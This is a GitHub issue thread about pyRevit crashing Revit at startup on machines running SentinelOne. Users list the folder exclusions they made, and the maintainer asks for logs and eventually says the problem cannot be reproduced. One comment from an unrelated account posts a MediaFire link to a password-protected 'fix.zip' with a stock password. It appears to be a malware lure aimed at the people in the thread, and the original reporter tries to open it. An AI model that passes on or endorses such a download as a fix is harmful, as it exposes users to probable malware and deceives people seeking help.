### ISSUE TITLE
[Bug]: pyRevit causes Revit to crash even after exceptions were made in SentinelOne

### ISSUE THREAD

**Issue by aclavijo1129** [pyrevitlabs/pyRevit#2378]
### ✈ Pre-Flight checks

- [X] I **don't have SentinelOne** antivirus installed (see above for the solution)
- [X] I have **searched in the issues** (open and closed) but couldn't find a similar issue
- [X] I have **searched in the [pyRevit Forum](https://discourse.pyrevitlabs.io)** for similar issues
- [X] I already **followed the [installation troubleshooting guide](https://pyrevitlabs.notion.site/Installation-issues-f6495adb56254e9e8021f8a68e3b2ab7) thoroughly**
- [X] I am using the **latest pyRevit Version**

### 🐞 Describe the bug

After creating the necessary exceptions Revit still crashes before the splash screen whenever pyRevit is downloaded and turned on. I tried the shutting off all other add-ins using DiRoots App Manager and Revit still crashes.

### ⌨ Error/Debug Message

```shell
N/A
```

### ⏲️ Expected behavior

N/A

### 🖥️ Hardware and Software Setup (please complete the following information)

```shell
Have SentinelOne on my computer however the necessary exceptions have been made.
```

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aclavijo1129** [comment]
![image](https://github.com/user-attachments/assets/dc45c3c4-d0ca-46bf-bb52-9f9da2d4d0dd)

I am unable to extract the zipped files. This is a work computer so a lot of things seem to be blocked.

**Comment by aclavijo1129** [comment]
Also what specific folders need to have exceptions made? Here is a list of the folders that our IT support made exceptions for. 

•	C:\Users*\AppData\Roaming\pyRevit-Master
•	C:\Users*\AppData\Roaming\pyRevit
•	C:\Users*\AppData\Roaming\Revit
•	C:\Users*\AppData\Roaming\Autodesk\Revit
•	C:\Program Files\Autodesk\Revit

**Comment by jmcouffin** [comment]
Have a look at https://www.notion.so/pyrevitlabs/Installation-issues-f6495adb56254e9e8021f8a68e3b2ab7?pvs=4#42e06d3e0f3f48ab985fe3579dea4122
@aclavijo1129

**Comment by jmcouffin** [comment]
@aclavijo1129 any news?

**Comment by MPJohnston85** [comment]
I am having the same issue although I'm not sure what the clip of the error is. I've shared this post with our IT provider who has made all of the given exceptions above to no avail.

**Comment by jmcouffin** [comment]
> I am having the same issue although I'm not sure what the clip of the error is. I've shared this post with our IT provider who has made all of the given exceptions above to no avail.

Does it crashes? Revit @MPJohnston85 
Please provide details if you expect us to try and find a solution.
Journal file would be useful

**Comment by MPJohnston85** [comment]
@jmcouffin Yes sir. Revit will open to splash screen, sit for +/-5 seconds and then closes. No warning or error popups. 
We just started with a new IT company who recently installed SentinelOne and I pointed them to this page. 

Here is the journal from my last attempt to open Revit with pyRevit 4.8.16.24121 installed.

[journal.0433.txt](https://github.com/user-attachments/files/17030006/journal.0433.txt)

I greatly appreciate you help. Please let me know if there is any additional information you need from me. 

Thanks!

**Comment by jmcouffin** [comment]
The journal does not say much.
Could you get a screen capture of the setup in sentinel one to confirm all the right exception are made? Coz' in the past, it always worked as long as the right exceptions were made, exceptions including on the Revit.exe...

**Comment by abritton1845** [comment]
Having the same issue as well, made all the exclusions (SHA1 hash and the file paths) on that original help thread and the program is still crashing with the Sentinel One agent enabled. Reached out to Nable and no help there - hoping there might some other things I could try? 
Thanks.

**Comment by jmcouffin** [comment]
> Having the same issue as well, made all the exclusions (SHA1 hash and the file paths) on that original help thread and the program is still crashing with the Sentinel One agent enabled. Reached out to Nable and no help there - hoping there might some other things I could try? Thanks.

Not much we can do. You are using pyrevit in a 'glass box' and we have no way to reproduce.
Sentinel's logs should give you pointers.
